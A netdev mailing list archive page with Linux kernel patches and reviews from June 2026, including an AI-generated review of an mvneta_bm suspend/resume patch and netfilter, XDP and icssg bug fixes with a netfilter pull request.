Netdev List

Netdev List
 help / color / mirror / Atom feed

* Re: [PATCH v4] net: mvneta_bm: add suspend/resume support to prevent crash after resume
From: Simon Horman @ 2026-06-20 19:00 UTC (permalink / raw)
  To: yun.zhou
  Cc: Simon Horman, marcin.s.wojtas, andrew+netdev, davem, edumazet,
	kuba, pabeni, netdev, linux-kernel
In-Reply-To: <20260618143516.1131805-1-yun.zhou@windriver.com>

This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://netdev-ai.bots.linux.dev/sashiko/
---
net: mvneta_bm: add suspend/resume support to prevent crash after resume

This patch adds suspend/resume callbacks to mvneta_bm so the BM hardware
state is drained at suspend and reinitialised at resume, and adds a
device_link from mvneta to mvneta_bm so PM ordering between the two is
guaranteed. A few questions on the new paths below.

> diff --git a/drivers/net/ethernet/marvell/mvneta.c b/drivers/net/ethernet/marvell/mvneta.c
> index 0c061fb0ed07..488f2663ad2c 100644
> --- a/drivers/net/ethernet/marvell/mvneta.c
> +++ b/drivers/net/ethernet/marvell/mvneta.c
> @@ -5678,6 +5678,24 @@ static int mvneta_probe(struct platform_device *pdev)
>  					 "use SW buffer management\n");
>  				mvneta_bm_put(pp->bm_priv);
>  				pp->bm_priv = NULL;
> +			} else if (!device_link_add(&pdev->dev,
> +						    &pp->bm_priv->pdev->dev,
> +						    DL_FLAG_AUTOREMOVE_CONSUMER)) {

[Medium]
Can the existing mvneta_bm_port_init() failure path leave priv->bm_pools[i]
in a state that the new suspend handler will then double-free?

mvneta_bm_pool_use() sets new_pool->type to LONG/SHORT before calling
mvneta_bm_pool_create(). If mvneta_bm_pool_create() fails after the
dma_alloc_coherent (for example at the alignment check or
mvebu_mbus_get_dram_win_info()), it does this:

  drivers/net/ethernet/marvell/mvneta_bm.c:mvneta_bm_pool_create() {
      ...
      dma_free_coherent(&pdev->dev, sizeof(u32) * size,
                        bm_pool->virt_addr, bm_pool->phys_addr);
      return -ENOMEM;
  }

It does not zero virt_addr, and the existing probe error path here only
calls mvneta_bm_put() and sets pp->bm_priv = NULL, without invoking
mvneta_bm_pool_destroy() on the partially-initialised pool:

  if (err < 0) {
      dev_info(&pdev->dev,
               "use SW buffer management\n");
      mvneta_bm_put(pp->bm_priv);
      pp->bm_priv = NULL;
  } else if (!device_link_add(...)) {

So priv->bm_pools[i] can be left with type != FREE and a freed-but-
non-NULL virt_addr. When mvneta_bm_suspend() later runs, it skips only
on type == MVNETA_BM_FREE and unconditionally calls
dma_free_coherent(bm_pool->virt_addr, ...) on the stale pointer.

Should the suspend loop mirror mvneta_bm_pool_destroy() and guard with
"if (bm_pool->virt_addr)" before calling dma_free_coherent(), and
NULL-check after?

> +				/*
> +				 * Link guarantees BM resumes before mvneta.
> +				 * Without it, BM may not be ready when
> +				 * mvneta_bm_port_init() runs on resume,
> +				 * causing stale buffer addresses and a crash.
> +				 * Fall back to SW management to be safe.
> +				 */
> +				dev_warn(&pdev->dev,
> +					 "failed to link to BM, use SW buffer management\n");
> +				mvneta_bm_pool_destroy(pp->bm_priv,
> +						       pp->pool_long, 1 << pp->id);
> +				mvneta_bm_pool_destroy(pp->bm_priv,
> +						       pp->pool_short, 1 << pp->id);
> +				mvneta_bm_put(pp->bm_priv);
> +				pp->bm_priv = NULL;
>  			}
>  		}
>  		/* Set RX packet offset correction for platforms, whose
> diff --git a/drivers/net/ethernet/marvell/mvneta_bm.c b/drivers/net/ethernet/marvell/mvneta_bm.c
> index 6bb380494919..85162a43eaf6 100644
> --- a/drivers/net/ethernet/marvell/mvneta_bm.c
> +++ b/drivers/net/ethernet/marvell/mvneta_bm.c
> @@ -477,6 +477,63 @@ static void mvneta_bm_remove(struct platform_device *pdev)
>  	clk_disable_unprepare(priv->clk);
>  }
>  
> +static int mvneta_bm_suspend(struct device *dev)
> +{
> +	struct mvneta_bm *priv = dev_get_drvdata(dev);
> +	int i;
> +
> +	/* Drain buffers and free pool resources while BM is still clocked */
> +	for (i = 0; i < MVNETA_BM_POOLS_NUM; i++) {
> +		struct mvneta_bm_pool *bm_pool = &priv->bm_pools[i];
> +		int size_bytes;
> +
> +		if (bm_pool->type == MVNETA_BM_FREE)
> +			continue;
> +
> +		mvneta_bm_bufs_free(priv, bm_pool, bm_pool->port_map);
> +		if (bm_pool->hwbm_pool.buf_num)
> +			dev_warn(&priv->pdev->dev,
> +				 "pool %d: %d buffers not freed\n",
> +				 bm_pool->id, bm_pool->hwbm_pool.buf_num);
> +
> +		size_bytes = sizeof(u32) * bm_pool->hwbm_pool.size;
> +		dma_free_coherent(&priv->pdev->dev, size_bytes,
> +				  bm_pool->virt_addr, bm_pool->phys_addr);
> +		bm_pool->virt_addr = NULL;
> +		bm_pool->type = MVNETA_BM_FREE;
> +	}
> +
> +	mvneta_bm_write(priv, MVNETA_BM_COMMAND_REG, MVNETA_BM_STOP_MASK);
> +	clk_disable_unprepare(priv->clk);
> +	return 0;
> +}

[Medium]
Why does this loop not call mvneta_bm_pool_disable() (or otherwise clear
MVNETA_BM_POOL_ENABLE_MASK in BASE_REG) per pool the way
mvneta_bm_pool_destroy() does?

mvneta_bm_pool_destroy() clears the per-pool enable bit before the
dma_free_coherent of the BPPE region. The new suspend ordering is
instead drain via BPPI -> dma_free_coherent(BPPE) -> next pool -> a
single global MVNETA_BM_STOP_MASK write at the end.

mvneta_bm_bufs_free() also clears MVNETA_BM_EMPTY_LIMIT_MASK on exit,
which re-enables auto-refill:

  drivers/net/ethernet/marvell/mvneta_bm.c:mvneta_bm_bufs_free() {
      ...
      mvneta_bm_config_clear(priv, MVNETA_BM_EMPTY_LIMIT_MASK);
      ...
  }

Between dma_free_coherent() for one pool's BPPE and the eventual global
STOP, BM hardware still has BASE_REG pointing at the freed phys_addr
with ENABLE_MASK set. Would matching mvneta_bm_remove()'s
"mvneta_bm_pool_destroy() per pool, then global STOP" ordering be safer
here?

[Low]
Resetting bm_pool->type to MVNETA_BM_FREE causes mvneta_bm_pool_use()
to re-enter its initialisation branch on every resume cycle, which
includes:

  mutex_init(&hwbm_pool->buf_lock);

on a struct mutex that was already initialised at first use. Repeated
mutex_init() on a previously-initialised mutex discards lockdep history
for that lock.

Could suspend either call mutex_destroy() on buf_lock to pair the
re-init, or leave bm_pool->type unchanged and only clear the dynamic
state (virt_addr, buf_num) so mvneta_bm_pool_use() does not re-enter
the init branch?

> +
> +static int mvneta_bm_resume(struct device *dev)
> +{
> +	struct mvneta_bm *priv = dev_get_drvdata(dev);
> +	int i, err;
> +
> +	err = clk_prepare_enable(priv->clk);
> +	if (err)
> +		return err;
> +
> +	/* Reinitialize BM hardware; pools are refilled by mvneta_resume() */
> +	mvneta_bm_default_set(priv);
> +
> +	/* Restore pool registers lost during clock gating */
> +	for (i = 0; i < MVNETA_BM_POOLS_NUM; i++) {
> +		mvneta_bm_write(priv, MVNETA_BM_POOL_READ_PTR_REG(i), 0);
> +		mvneta_bm_write(priv, MVNETA_BM_POOL_WRITE_PTR_REG(i), 0);
> +		mvneta_bm_write(priv, MVNETA_BM_POOL_SIZE_REG(i),
> +				priv->bm_pools[i].hwbm_pool.size);
> +	}
> +
> +	mvneta_bm_write(priv, MVNETA_BM_COMMAND_REG, MVNETA_BM_START_MASK);
> +	return 0;
> +}

[Medium]
The comment says "Restore pool registers lost during clock gating", but
the loop only restores SIZE_REG, READ_PTR_REG and WRITE_PTR_REG, and
does not touch MVNETA_BM_POOL_BASE_REG (which carries the BPPE physical
address and the per-pool MVNETA_BM_POOL_ENABLE_MASK).

Combined with mvneta_bm_suspend() not clearing the per-pool ENABLE_MASK
before clk_disable_unprepare(), MVNETA_BM_START_MASK is being written
here with each BASE_REG in an unspecified state.

If the IP retains BASE_REG content across clock gating, BM would be
started with stale BPPE phys_addrs (now freed memory) and ENABLE_MASK
set, until mvneta_resume() drives mvneta_bm_pool_create() to overwrite
BASE_REG.

Could resume explicitly clear each MVNETA_BM_POOL_BASE_REG (or at least
its ENABLE_MASK) before writing START_MASK, or could suspend clear the
per-pool ENABLE_MASK before disabling the clock?

^ permalink raw reply

* Re: Ethtool : PRBS feature
From: Andrew Lunn @ 2026-06-20 19:20 UTC (permalink / raw)
  To: Maxime Chevallier
  Cc: Das, Shubham, Alexander H Duyck, lee@trager.us,
	netdev@vger.kernel.org, mkubecek@suse.cz, D H, Siddaraju,
	Chintalapalle, Balaji, Lindberg, Magnus,
	niklas.damberg@ericsson.com
In-Reply-To: <be5c474b-c969-49af-8235-825580ee945c@bootlin.com>

On Sat, Jun 20, 2026 at 04:39:06PM +0200, Maxime Chevallier wrote:
> Hi,
> 
> On 6/20/26 15:48, Das, Shubham wrote:
> >> Can you change the firmware to expose the 802.3 registers for PRBS?
> >> You can then write a library which both plylib and your driver can use.
> > 
> > Andrew,
> > 
> > No, exposing the PRBS registers to drivers is not possible in our design (the registers are buried deep within the Accelerator/NIC/PHY/Analog IP hierarchy).
> > 
> > Additionally, the PHY PRBS registers are not in accordance with the IEEE Clause 45 definitions. For instance, the PRBS registers are paged and 32-bit wide.
> > 

Hi Shubham

Do you at least have the functionality of the standard C45 registers,
even if the addresses and bit fields are messed up?

If you do, maybe we should actually start with a C45 conforming
implementation, and then you can do a translation layer to whatever
oddball implementation you have?

> > Given these constraints, we think ethtool --phy-test is a
> > reasonable starting point for exposing the long-established
> > Ethernet PRBS functionality to Linux userspace, as it aligns well
> > with the driver-owned NIC architecture model.

I agree an ethtool --phy-test makes sense, but we need to ensure
standard based C45 functionality is covered, not just your oddball
vendor functionality.

	Andrew

^ permalink raw reply

* Re: [PATCH net] net: phylink: print correct c45 phy id when missing PHY driver
From: Andrew Lunn @ 2026-06-20 19:24 UTC (permalink / raw)
  To: Aleksander Jan Bajkowski
  Cc: linux, hkallweit1, davem, edumazet, kuba, pabeni, rmk+kernel,
	vladimir.oltean, netdev, linux-kernel
In-Reply-To: <20260620131130.949298-1-olek2@wp.pl>

On Sat, Jun 20, 2026 at 03:11:13PM +0200, Aleksander Jan Bajkowski wrote:
> If no PHY driver is found, `phy_id` is returned. `phy_id` holds the c22 ID.
> Modules with a rollball bridge support only c45 transfers. The c45 IDs are
> stored in the `c45_ids` structure. In the current code these modules report
> an ID 0x00000000. This may lead users to mistakenly conclude that the
> rollball bridge isn't properly implemented in their SFP module. This patch
> fixes the wrong IDs for c45 modules when a driver cannot be found.

The problem with C45 is there is not one ID, but multiple IDs. And
they can be from different vendors, depending on who the different IP
blocks have been licensed from.

We came to the conclusion not to report any C45 IDs is the most
meaningful thing to do.

      Andrew

^ permalink raw reply

* [PATCH net] net, bpf: check master for NULL in xdp_master_redirect()
From: Xiang Mei @ 2026-06-20 20:15 UTC (permalink / raw)
  To: Daniel Borkmann, Martin KaFai Lau, Jesper Dangaard Brouer,
	Jiayuan Chen, netdev, bpf
  Cc: John Fastabend, Stanislav Fomichev, Alexei Starovoitov,
	Jussi Maki, Paolo Abeni, Weiming Shi, Xiang Mei

xdp_master_redirect() dereferences the result of
netdev_master_upper_dev_get_rcu() without a NULL check, but that helper
returns NULL when the receiving device has no upper-master adjacency.

The reach guard only checks netif_is_bond_slave(). On bond slave release
bond_upper_dev_unlink() drops the upper-master adjacency before clearing
IFF_SLAVE, so an XDP_TX reaching xdp_master_redirect() in that window
still passes netif_is_bond_slave() while master is already NULL, and
faults on master->flags at offset 0xb0:

  BUG: kernel NULL pointer dereference, address: 00000000000000b0
  RIP: 0010:xdp_master_redirect (net/core/filter.c:4432)
  Call Trace:
   xdp_master_redirect (net/core/filter.c:4432)
   bpf_prog_run_generic_xdp (include/net/xdp.h:700)
   do_xdp_generic (net/core/dev.c:5608)
   __netif_receive_skb_one_core (net/core/dev.c:6204)
   process_backlog (net/core/dev.c:6319)
   __napi_poll (net/core/dev.c:7729)
   net_rx_action (net/core/dev.c:7792)
   handle_softirqs (kernel/softirq.c:622)
   __dev_queue_xmit (include/linux/bottom_half.h:33)
   packet_sendmsg (net/packet/af_packet.c:3082)
   __sys_sendto (net/socket.c:2252)
  Kernel panic - not syncing: Fatal exception in interrupt

The missing check dates back to the original code; commit 1921f91298d1
("net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master")
later added the master->flags read where the fault now lands but kept the
unconditional deref. Check master for NULL before use; a NULL master is
treated the same as one that is not up.

Fixes: 879af96ffd72 ("net, core: Add support for XDP redirection to slave device")
Reported-by: Weiming Shi <bestswngs@gmail.com>
Assisted-by: Claude:claude-opus-4-8
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
 net/core/filter.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/core/filter.c b/net/core/filter.c
index 40037413dd4e..6037860d5283 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -4430,7 +4430,7 @@ u32 xdp_master_redirect(struct xdp_buff *xdp)
 	struct net_device *master, *slave;

 	master = netdev_master_upper_dev_get_rcu(xdp->rxq->dev);
-	if (unlikely(!(master->flags & IFF_UP)))
+	if (unlikely(!master || !(master->flags & IFF_UP)))
 		return XDP_ABORTED;
 	slave = master->netdev_ops->ndo_xdp_get_xmit_slave(master, xdp);
 	if (slave && slave != xdp->rxq->dev) {
-- 
2.43.0

^ permalink raw reply related

* Re: Bug#1130336: [regression] Network failure beyond first connection after 69894e5b4c5e ("netfilter: nft_connlimit: update the count if add was skipped")
From: Salvatore Bonaccorso @ 2026-06-20 20:44 UTC (permalink / raw)
  To: Fernando Fernandez Mancera
  Cc: Thorsten Leemhuis, Alejandro Oliván Alvarez, 1130336,
	Florian Westphal, Pablo Neira Ayuso, Phil Sutter, David S. Miller,
	Eric Dumazet, Jakub Kicinski, Paolo Abeni, Simon Horman,
	netfilter-devel, coreteam, netdev, linux-kernel, regressions,
	stable
In-Reply-To: <f67a985f-c6a0-4796-b255-59d99e317b6f@suse.de>

Hi Fernando,

On Wed, Apr 22, 2026 at 12:32:34PM +0200, Fernando Fernandez Mancera wrote:
> On 4/22/26 11:18 AM, Thorsten Leemhuis wrote:
> > Lo! Top-posting on purpose to make this easy to process.
> > 
> > What happened to this regression? It looks a bit like things stalled and
> > fell through the cracks. Or Fernando, did you post a patch like you
> > mentioned? I looked for one referring the commit or the reporter, but
> > could not find anything -- but maybe I missed it.
> > 
> 
> Yes, it stalled and fell through the cracks. Let me prepare a fix as I
> mentioned.

Did that happened? On a quick chek at least 7.0.13 upstream seem still
to exhibit the problem (or would it be fair to let this usecase rest?)

Regards,
Salvatore

^ permalink raw reply

* [PATCH net] net: ti: icssg-prueth: fix XDP_TX from the AF_XDP zero-copy RX path
From: David Carlier @ 2026-06-20 21:37 UTC (permalink / raw)
  To: danishanwar, rogerq, andrew+netdev, netdev
  Cc: davem, edumazet, kuba, pabeni, horms, m-malladi, hawk,
	john.fastabend, sdf, ast, daniel, bpf, linux-arm-kernel,
	linux-kernel, stable, David Carlier

On XDP_TX from the zero-copy RX path, emac_run_xdp() converts the xsk
buffer via xdp_convert_zc_to_xdp_frame(), which clones the data into a
fresh MEM_TYPE_PAGE_ORDER0 page that is not DMA mapped. Transmitting it
as PRUETH_TX_BUFF_TYPE_XDP_TX derives the DMA address with
page_pool_get_dma_addr(), reading an uninitialized page->dma_addr, so
the device DMAs from a bogus address (corrupt TX, or an IOMMU fault).

Pick the TX buffer type from the frame's memory type: keep
PRUETH_TX_BUFF_TYPE_XDP_TX for page_pool frames and use
PRUETH_TX_BUFF_TYPE_XDP_NDO for the cloned zero-copy frame. The
completion path already unmaps PRUETH_SWDATA_XDPF buffers.

Fixes: 7a64bb388df3 ("net: ti: icssg-prueth: Add AF_XDP zero copy for RX")
Cc: stable@vger.kernel.org
Signed-off-by: David Carlier <devnexen@gmail.com>
---
 drivers/net/ethernet/ti/icssg/icssg_common.c | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/ti/icssg/icssg_common.c b/drivers/net/ethernet/ti/icssg/icssg_common.c
index 82ddef9c17d5..302e700ea17d 100644
--- a/drivers/net/ethernet/ti/icssg/icssg_common.c
+++ b/drivers/net/ethernet/ti/icssg/icssg_common.c
@@ -804,6 +804,7 @@ EXPORT_SYMBOL_GPL(emac_xmit_xdp_frame);
  */
 static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len)
 {
+	enum prueth_tx_buff_type tx_buff_type;
 	struct net_device *ndev = emac->ndev;
 	struct netdev_queue *netif_txq;
 	int cpu = smp_processor_id();
@@ -826,11 +827,21 @@ static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len
 			goto drop;
 		}
 
+		/* In AF_XDP zero-copy mode xdp_convert_buff_to_frame()
+		 * clones the xsk buffer into a fresh MEM_TYPE_PAGE_ORDER0
+		 * page that is not DMA mapped. Such a frame must be mapped
+		 * via the NDO path; only a page pool-backed frame already
+		 * carries a usable page_pool DMA address.
+		 */
+		tx_buff_type = xdpf->mem_type == MEM_TYPE_PAGE_POOL ?
+				PRUETH_TX_BUFF_TYPE_XDP_TX :
+				PRUETH_TX_BUFF_TYPE_XDP_NDO;
+
 		q_idx = cpu % emac->tx_ch_num;
 		netif_txq = netdev_get_tx_queue(ndev, q_idx);
 		__netif_tx_lock(netif_txq, cpu);
 		result = emac_xmit_xdp_frame(emac, xdpf, q_idx,
-					     PRUETH_TX_BUFF_TYPE_XDP_TX);
+					     tx_buff_type);
 		__netif_tx_unlock(netif_txq);
 		if (result == ICSSG_XDP_CONSUMED) {
 			ndev->stats.tx_dropped++;
-- 
2.53.0


^ permalink raw reply related

* [PATCH net,v2 00/14] Netfilter fixes for net
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms

This is v2, dropping two patches that need a bit more work,
uncovered by sashiko. I have revisit the working of this cover
letter to refine it.

-o-

Hi,
 
The following patchset contains Netfilter fixes for net. This batches
fixes for real crashes with trivial/correctness fixes. There is too
a rework of the conntrack expectation timeout strategy to deal with
a possible race when removing an expectation.
 
1) Fix the incorrect flowtable timeout extension for entries in
   hw offload, from Adrian Bente. This is correcting a defect in
   the functionality, no crash.
 
2) Hold reference to device under the fake dst in br_netfilter,
   from Haoze Xie. This is fixing a possible UaF if the device
   is removed while packet is sitting in nfqueue.
 
3) Reject template conntrack in xt_cluster, otherwise access to
   uninitialize conntrack fields are possible leading to WARN_ON
   due to unset layer 3 protocol. From Wyatt Feng.
 
4) Make sure the IPv6 tunnel header is in the linear skb data
   area before pulling. While at it remove incomplete NEXTHDR_DEST
   support. From Lorenzo Bianconi. This possibly leading to crash
   if IPv4 header is not in the linear area.
 
5) Use test_bit_acquire in ipset hash set to avoid reordering
   of subsequent memory access. This is addressing a LLM related
   report, no crash has been observed. From Jozsef Kadlecsik.
 
6) Use test_bit_acquire in ipset bitmap set too, for the same
   reason as in the previous patch, from Jozsef Kadlecsik.
 
7) Call kfree_rcu() after rcu_assign_pointer() to address a
   possible UaF if kfree_rcu() runs inmediately, which to my
   understanding never happens. Never observed in practise,
   reported by LLM. Also from Jozsef Kadlecsik.

8) Use disable_delayed_work_sync() instead cancel_delayed_work_sync()
   to avoid that ipset GC handler re-queues work as reported by LLM.
   From Jozsef Kadlecsik. This is for correctness.
 
9) Restore the check in nft_payload for exceeding payloda offset
    over 2^16. From Florian Westphal. This fixes a silent truncation,
    not a big deal, but better be assertive and reject it.
 
10) Validate NFT_META_BRI_IIFHWADDR can only run from bridge
    prerouting. From Florian Westphal. Harmless but it could allow
    to read bytes from skb->cb.
 
11) Zero out destination hardware address during the flowtable
    path setup, also from Florian. This is a correctness fix, LLM
    points that possible infoleak can happen but topology to achieve
    it is not clear.

12) Skip IPv4 options if present when building the IPV4 reject reply.
    Otherwise bytes in the IPv4 options header can be sent back to
    origin where the ICMP header is being expected. Again from
    Florian Westphal.
 
13) Replace timer API for expectation by GC worker approach. This
    is implicitly fixing a race between nf_ct_remove_expectations()
    which might fail to remove the expectation due to timer_del()
    returning false because timer has expired and callback is
    being run concurrently. This fix is addressing a crash that has
    been already reported with a reproducer.

14) Check if br_vlan_get_pvid_rcu() fails, otherwise possible stack
    infoleak of 4-bytes. From Florian Westphal.

Please, pull these changes from:

  git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git nf-26-06-21

Thanks.

----------------------------------------------------------------

The following changes since commit 96e7f9122aae0ed000ee321f324b812a447906d9:

  eth: fbnic: take netif_addr_lock_bh() around rx mode address programming (2026-06-18 18:36:26 -0700)

are available in the Git repository at:

  git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git tags/nf-26-06-21

for you to fetch changes up to 27dd2997746d54ebc079bb13161cc1bdd401d4a6:

  netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak (2026-06-21 00:18:37 +0200)

----------------------------------------------------------------
netfilter pull request 26-06-21

----------------------------------------------------------------
Adrian Bente (1):
      netfilter: flowtable: fix offloaded ct timeout never being extended

Florian Westphal (5):
      netfilter: nft_payload: reject offsets exceeding 65535 bytes
      netfilter: nft_meta_bridge: add validate callback for get operations
      netfilter: nft_flow_offload: zero device address for non-ether case
      netfilter: nf_reject: skip iphdr options when looking for icmp header
      netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak

Haoze Xie (1):
      netfilter: nf_queue: pin bridge device while NFQUEUE holds fake dst

Jozsef Kadlecsik (4):
      netfilter: ipset: Don't use test_bit() in lockless RCU readers in hash types
      netfilter: ipset: Don't use test_bit() in lockless RCU readers in bitmap types
      netfilter: ipset: fix order of kfree_rcu() and rcu_assign_pointer()
      netfilter: ipset: make sure gc is properly stopped

Lorenzo Bianconi (1):
      netfilter: flowtable: fix and simplify IP6IP6 tunnel handling

Pablo Neira Ayuso (1):
      netfilter: nf_conntrack_expect: use conntrack GC to reap expectations

Wyatt Feng (1):
      netfilter: xt_cluster: reject template conntracks in hash match

 include/net/netfilter/nf_conntrack_expect.h        |  16 ++-
 include/net/netfilter/nf_queue.h                   |   1 +
 include/net/netfilter/nft_meta.h                   |   2 +
 include/uapi/linux/netfilter/nf_conntrack_common.h |   1 +
 net/bridge/netfilter/nft_meta_bridge.c             |  23 +++-
 net/ipv4/netfilter/nf_reject_ipv4.c                |   2 +-
 net/ipv6/ip6_tunnel.c                              |   7 +
 net/netfilter/ipset/ip_set_bitmap_gen.h            |   4 +-
 net/netfilter/ipset/ip_set_bitmap_ip.c             |   2 +-
 net/netfilter/ipset/ip_set_bitmap_ipmac.c          |   2 +-
 net/netfilter/ipset/ip_set_bitmap_port.c           |   2 +-
 net/netfilter/ipset/ip_set_core.c                  |   4 +-
 net/netfilter/ipset/ip_set_hash_gen.h              |  12 +-
 net/netfilter/nf_conntrack_core.c                  |  33 ++++-
 net/netfilter/nf_conntrack_expect.c                | 145 ++++++++++-----------
 net/netfilter/nf_conntrack_h323_main.c             |   4 +-
 net/netfilter/nf_conntrack_helper.c                |  10 +-
 net/netfilter/nf_conntrack_netlink.c               |  22 ++--
 net/netfilter/nf_conntrack_sip.c                   |  13 +-
 net/netfilter/nf_flow_table_core.c                 |  13 +-
 net/netfilter/nf_flow_table_ip.c                   |  80 +++---------
 net/netfilter/nf_flow_table_path.c                 |   4 +-
 net/netfilter/nf_queue.c                           |  14 ++
 net/netfilter/nfnetlink_queue.c                    |   3 +
 net/netfilter/nft_ct.c                             |   3 +-
 net/netfilter/nft_meta.c                           |   5 +-
 net/netfilter/nft_payload.c                        |  16 ++-
 net/netfilter/xt_cluster.c                         |   2 +-
 .../selftests/net/netfilter/nft_flowtable.sh       |   8 +-
 29 files changed, 254 insertions(+), 199 deletions(-)

^ permalink raw reply

* [PATCH net 01/14] netfilter: flowtable: fix offloaded ct timeout never being extended
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Adrian Bente <adibente@gmail.com>

OpenWrt has recently migrated many platforms to kernel 6.18. On the
MediaTek platform, which supports hardware network offloading, WiFi
connections accelerated via the WED path were observed to drop after
roughly 300 seconds.

After several debugging sessions, assisted by the Claude LLM, the
problem was narrowed down as follows:

nf_flow_table_extend_ct_timeout() extends ct->timeout for offloaded
flows using:

	cmpxchg(&ct->timeout, expires, new_timeout);

'expires' comes from nf_ct_expires(ct) and is a relative value, while
ct->timeout holds an absolute timestamp. The two are never equal, so
the cmpxchg always fails and the timeout is never extended.

This goes unnoticed for most flows, but a long-lived hardware (WED)
offloaded flow on MediaTek MT7986 eventually has ct->timeout decay to
zero, the conntrack entry is reaped and the connection breaks.

Open-code the relative value from a single READ_ONCE(ct->timeout)
snapshot and compare against that same absolute snapshot in the
cmpxchg, so the timeout extension actually takes effect while the
datapath remains authoritative if it updates ct->timeout concurrently.

Fixes: 03428ca5cee9 ("netfilter: conntrack: rework offload nf_conn timeout extension logic")
Cc: stable@vger.kernel.org
Suggested-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Adrian Bente <adibente@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/nf_flow_table_core.c | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/nf_flow_table_core.c b/net/netfilter/nf_flow_table_core.c
index 785d8c244a77..99c5b9d671a0 100644
--- a/net/netfilter/nf_flow_table_core.c
+++ b/net/netfilter/nf_flow_table_core.c
@@ -505,8 +505,13 @@ static u32 nf_flow_table_tcp_timeout(const struct nf_conn *ct)
  */
 static void nf_flow_table_extend_ct_timeout(struct nf_conn *ct)
 {
-	static const u32 min_timeout = 5 * 60 * HZ;
-	u32 expires = nf_ct_expires(ct);
+	static const s32 min_timeout = 5 * 60 * HZ;
+	u32 ct_timeout = READ_ONCE(ct->timeout);
+	s32 expires;
+
+	expires = ct_timeout - nfct_time_stamp;
+	if (expires <= 0) /* already expired */
+		return;

 	/* normal case: large enough timeout, nothing to do. */
 	if (likely(expires >= min_timeout))
@@ -524,7 +529,7 @@ static void nf_flow_table_extend_ct_timeout(struct nf_conn *ct)
 	if (nf_ct_is_confirmed(ct) &&
 	    test_bit(IPS_OFFLOAD_BIT, &ct->status)) {
 		u8 l4proto = nf_ct_protonum(ct);
-		u32 new_timeout = true;
+		u32 new_timeout = 1;

 		switch (l4proto) {
 		case IPPROTO_UDP:
@@ -549,7 +554,7 @@ static void nf_flow_table_extend_ct_timeout(struct nf_conn *ct)
 		 */
 		if (new_timeout) {
 			new_timeout += nfct_time_stamp;
-			cmpxchg(&ct->timeout, expires, new_timeout);
+			cmpxchg(&ct->timeout, ct_timeout, new_timeout);
 		}
 	}

-- 
2.47.3

^ permalink raw reply related

* [PATCH net 02/14] netfilter: nf_queue: pin bridge device while NFQUEUE holds fake dst
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Haoze Xie <royenheart@gmail.com>

The br_netfilter fake rtable is embedded in struct net_bridge and is
attached to bridged packets with skb_dst_set_noref(). If such a packet is
queued to NFQUEUE, __nf_queue() upgrades that fake dst with
skb_dst_force().

At that point the queued skb can hold a real dst reference after bridge
teardown has started. The problem is not that every bridged packet needs
its own dst reference. The problem is that NFQUEUE can keep the bridge
private fake dst alive after unregister begins.

Fix this by keeping the bridge fake dst model unchanged and pinning the
bridge master device only while the packet sits in NFQUEUE. Record the
bridge device in nf_queue_entry when the queued skb carries a bridge fake
dst, take a device reference for the queue lifetime, and drop it when the
queue entry is freed.

Also make sure queued entries are reaped when that bridge device goes
down, and drop the redundant nf_bridge_info_exists() test from the fake
dst detection.

This keeps netdev_priv(br->dev) alive until verdict completion, so the
embedded fake rtable and its metrics backing storage cannot be freed out
from under dst_release(). It also avoids the constant refcount bump and
avoids using ipv4-specific dst helpers for IPv6 bridge traffic.

Fixes: 34666d467cbf ("netfilter: bridge: move br_netfilter out of the core")
Cc: stable@kernel.org
Reported-by: Yuan Tan <yuantan098@gmail.com>
Reported-by: Yifan Wu <yifanwucs@gmail.com>
Reported-by: Juefei Pu <tomapufckgml@gmail.com>
Reported-by: Xin Liu <bird@lzu.edu.cn>
Signed-off-by: Haoze Xie <royenheart@gmail.com>
Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 include/net/netfilter/nf_queue.h |  1 +
 net/netfilter/nf_queue.c         | 14 ++++++++++++++
 net/netfilter/nfnetlink_queue.c  |  3 +++
 3 files changed, 18 insertions(+)

diff --git a/include/net/netfilter/nf_queue.h b/include/net/netfilter/nf_queue.h
index 3978c3174cdb..fc3e81c07364 100644
--- a/include/net/netfilter/nf_queue.h
+++ b/include/net/netfilter/nf_queue.h
@@ -18,6 +18,7 @@ struct nf_queue_entry {
 	unsigned int		id;
 	unsigned int		hook_index;	/* index in hook_entries->hook[] */
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+	struct net_device	*bridge_dev;
 	struct net_device	*physin;
 	struct net_device	*physout;
 #endif
diff --git a/net/netfilter/nf_queue.c b/net/netfilter/nf_queue.c
index 57b450024a99..73363ceedebe 100644
--- a/net/netfilter/nf_queue.c
+++ b/net/netfilter/nf_queue.c
@@ -68,6 +68,7 @@ static void nf_queue_entry_release_refs(struct nf_queue_entry *entry)
 		nf_queue_sock_put(state->sk);
 
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+	dev_put(entry->bridge_dev);
 	dev_put(entry->physin);
 	dev_put(entry->physout);
 #endif
